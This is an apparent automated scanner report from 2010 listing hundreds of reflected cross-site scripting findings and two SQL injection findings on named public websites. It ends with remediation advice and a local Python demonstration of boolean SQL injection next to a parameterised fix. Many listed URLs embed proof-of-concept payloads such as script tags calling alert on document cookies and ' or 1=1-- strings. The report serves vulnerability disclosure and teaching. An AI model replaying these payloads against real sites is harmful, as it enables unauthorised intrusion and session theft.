Report generated by XSS.CX at Sat Nov 20 12:20:48 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents


1. SQL injection

1.1. http://www.ask.com/jsignin [REST URL parameter 1]

1.2. http://www.ask.com/local [gc cookie]

2. Cross-site scripting (reflected)

2.1. http://ad.vulnerable.ad.partner/adj/Auctions/ros [kw parameter]

2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]

2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

2.4. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

2.5. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

2.6. http://auction.nhl.com/cgi-bin/ncommerce3/User [type parameter]

2.7. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]

2.8. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]

2.9. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.10. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.11. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

2.12. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]

2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

2.15. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]

2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

2.18. https://checkout.netsuite.com/s.nl [vid parameter]

2.19. http://dictionary.reference.com/browse/turn [REST URL parameter 2]

2.20. http://digg.com/submit [REST URL parameter 1]

2.21. http://ds.addthis.com/red/psi/p.json [callback parameter]

2.22. http://ds.addthis.com/red/psi/sites/www.directpointe.com/p.json [callback parameter]

2.23. http://images.ask.com/pictures [q parameter]

2.24. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.25. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.26. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.27. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.28. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.29. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.30. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.31. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.32. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.33. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.42. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.43. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.44. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.45. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.46. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.47. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.48. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.49. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.50. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.51. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.52. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.53. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.54. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.55. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.56. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.57. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.58. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.59. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.60. http://jqueryui.com/themeroller/ [fcActive parameter]

2.61. http://jqueryui.com/themeroller/ [fcContent parameter]

2.62. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.63. http://jqueryui.com/themeroller/ [fcError parameter]

2.64. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.65. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.66. http://jqueryui.com/themeroller/ [fcHover parameter]

2.67. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.68. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.69. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.70. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.71. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.72. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.73. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.74. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.75. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.76. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.78. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.79. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.80. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.81. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.82. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

2.85. http://siteanalytics.compete.com/DOMAIN/ [REST URL parameter 1]

2.86. http://ss.ask.com/query [fn parameter]

2.87. http://ss.ask.com/query [q parameter]

2.88. http://static.wix.com/client/getComponentsTypeList.php [componentTypeViewerList parameter]

2.89. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.90. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.92. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

2.93. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]

2.95. http://www.addthis.com/favicon.ico [REST URL parameter 1]

2.96. http://www.addthis.com/favicon.ico [REST URL parameter 1]

2.97. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

2.98. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

2.99. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

2.100. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

2.101. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

2.102. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

2.103. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

2.104. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

2.105. http://www.addthis.com/services/submit [REST URL parameter 1]

2.106. http://www.addthis.com/services/submit [REST URL parameter 1]

2.107. http://www.addthis.com/services/submit [REST URL parameter 2]

2.108. http://www.addthis.com/services/submit [REST URL parameter 2]

2.109. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

2.110. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

2.111. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

2.112. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

2.113. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

2.114. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]

2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]

2.116. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

2.117. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]

2.118. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

2.119. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]

2.120. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

2.121. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]

2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]

2.123. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

2.124. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 1]

2.125. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

2.126. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 2]

2.127. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

2.128. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [REST URL parameter 3]

2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]

2.130. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

2.131. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

2.132. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

2.133. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

2.134. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

2.135. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]

2.137. http://www.ask.com/pictures [l parameter]

2.138. http://www.ask.com/pictures [l parameter]

2.139. http://www.ask.com/pictures [q parameter]

2.140. http://www.ask.com/pictureslanding [l parameter]

2.141. http://www.ask.com/pictureslanding [q parameter]

2.142. http://www.ask.com/web [q parameter]

2.143. http://www.ask.com/web [qid parameter]

2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]

2.145. http://www.dcgla.com/includes/testimonial.php [id parameter]

2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]

2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]

2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]

2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]

2.150. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.151. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.152. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.153. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.154. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]

2.155. http://www.mapquest.com/maps/map.adp [country parameter]

2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]

2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]

2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]

2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]

2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]

2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]

2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]

2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]

2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]

2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]

2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]

2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]

2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]

2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]

2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]

2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]

2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]

2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]

2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]

2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]

2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]

2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]

2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]

2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]

2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]

2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]

2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]

2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]

2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]

2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]

2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]

2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]

2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]

2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]

2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]

2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]

2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]

2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]

2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]

2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]

2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]

2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]

2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]

2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]

2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]

2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]

2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]

2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]

2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]

2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]

2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]

2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]

2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]

2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]

2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]

2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]

2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]

2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]

2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]

2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]

2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]

2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]

2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]

2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]

2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]

2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]

2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]

2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]

2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]

2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]

2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]

2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]

2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]

2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]

2.230. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]

2.231. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]

2.232. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]

2.233. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]

2.234. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]

2.235. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]

2.236. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]

2.237. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]

2.238. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]

2.239. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]

2.240. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]

2.241. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]

2.242. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]

2.243. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]

2.244. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]

2.245. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]

2.246. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]

2.247. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]

2.248. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]

2.249. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]

2.250. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]

2.251. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]

2.252. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]

2.253. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]

2.254. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]

2.255. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]

2.256. http://medienfreunde.com/ [Referer HTTP header]

2.257. http://player.vimeo.com/video/14121087 [Referer HTTP header]

2.258. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.259. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.260. http://www.directpointe.com/ [Referer HTTP header]

2.261. http://www.directpointe.com/consultation.aspx [Referer HTTP header]

2.262. http://www.directpointe.com/landing_pages/states/california.aspx [Referer HTTP header]

2.263. http://www.directpointe.com/regional.aspx [Referer HTTP header]

2.264. http://www.directpointe.com/solutions/additional_services.aspx [Referer HTTP header]

2.265. http://www.directpointe.com/solutions/cloud_computing.aspx [Referer HTTP header]

2.266. http://www.directpointe.com/solutions/faq.aspx [Referer HTTP header]

2.267. http://www.directpointe.com/solutions/index.aspx [Referer HTTP header]

2.268. http://www.directpointe.com/solutions/industry_solutions.aspx [Referer HTTP header]

2.269. http://www.directpointe.com/solutions/network_services.aspx [Referer HTTP header]

2.270. http://www.directpointe.com/solutions/newsletter.aspx [Referer HTTP header]

2.271. http://www.directpointe.com/solutions/pc_services.aspx [Referer HTTP header]

2.272. http://www.directpointe.com/solutions/print_services.aspx [Referer HTTP header]

2.273. http://www.directpointe.com/solutions/professional_services.aspx [Referer HTTP header]

2.274. http://www.directpointe.com/solutions/server_services.aspx [Referer HTTP header]

2.275. http://www.directpointe.com/solutions/virtual_services.aspx [Referer HTTP header]

2.276. http://www.directpointe.com/thanks.aspx [Referer HTTP header]

2.277. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

2.278. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 1]

2.279. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 2]

2.280. http://www.ask.com/ [wz_uid cookie]

2.281. http://www.ask.com/about [user cookie]

2.282. http://www.ask.com/ans [wz_uid cookie]

2.283. http://www.ask.com/blogsearch [wz_uid cookie]

2.284. http://www.ask.com/homepage [wz_uid cookie]

2.285. http://www.ask.com/pictureslanding [user cookie]

2.286. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 [wz_uid cookie]

2.287. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES [wz_uid cookie]

2.288. http://www.ask.com/video [wz_uid cookie]

2.289. http://www.ask.com/web [wz_uid cookie]

2.290. http://www.ask.com/web [wz_uid cookie]

2.291. http://www.ask.com/web [wz_uid cookie]



1. SQL injection
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.ask.com/jsignin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ask.com
Path:   /jsignin

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 25257047'%20or%201%3d1--%20 and 25257047'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the evidence is weak: both requests were answered, after a redirect, with the same 200 OK Ask.com home page, and the only visible differences between the two response header sets (the Date header, the base64-encoded timestamp in the puser cookie, and the cookie Expires values) change with every request regardless of the payload. Unless the response bodies differ in a payload-dependent way, this finding should be treated as a false positive.
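The following Python script is an added illustration and is not part of the scanner report or of any Ask.com code. It reproduces the two-request boolean test behind this finding (the payloads 25257047'%20or%201%3d1--%20 and 25257047'%20or%201%3d2--%20 decode to 25257047' or 1=1--  and 25257047' or 1=2-- ) against a constructed SQLite users table, first through a query built by string concatenation and then through the parameterised query recommended in the remediation section above. The table name, column names and seed rows are assumptions made for the example; the point is that the TRUE/FALSE pair returns different row sets only when the input reaches the query as SQL text.

```python
import sqlite3

# Constructed sample data for the example (not taken from the report):
# three rows seeded into an in-memory SQLite database so it runs offline.
SEED_ROWS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]


def make_db():
    """Create an in-memory database holding a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Vulnerable lookup: the untrusted value is spliced into the SQL text.
    A single quote in the input closes the string literal, so the rest of
    the input is parsed as part of the WHERE clause and '-- ' comments out
    the application's own trailing quote."""
    sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, name):
    """Remediated lookup: the query structure is fixed first with a '?'
    placeholder and the driver binds the value separately, so the input is
    always treated as data no matter which characters it contains."""
    sql = "SELECT id, name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def boolean_difference_test(conn, lookup, prefix="25257047"):
    """Replay the scanner's TRUE/FALSE payload pair from finding 1.1 against
    the given lookup function and report whether the two results differ.
    A difference is the signal a difference-based scanner keys on; a
    parameterised query yields identical (empty) results for both."""
    payload_true = prefix + "' or 1=1-- "
    payload_false = prefix + "' or 1=2-- "
    rows_true = lookup(conn, payload_true)
    rows_false = lookup(conn, payload_false)
    return {
        "true_rows": len(rows_true),
        "false_rows": len(rows_false),
        "differs": rows_true != rows_false,
    }


if __name__ == "__main__":
    db = make_db()
    # Concatenated query: TRUE payload returns every row, FALSE payload none.
    print("vulnerable:    ", boolean_difference_test(db, lookup_vulnerable))
    # Parameterised query: both payloads are looked up as literal names.
    print("parameterised: ", boolean_difference_test(db, lookup_parameterised))
```

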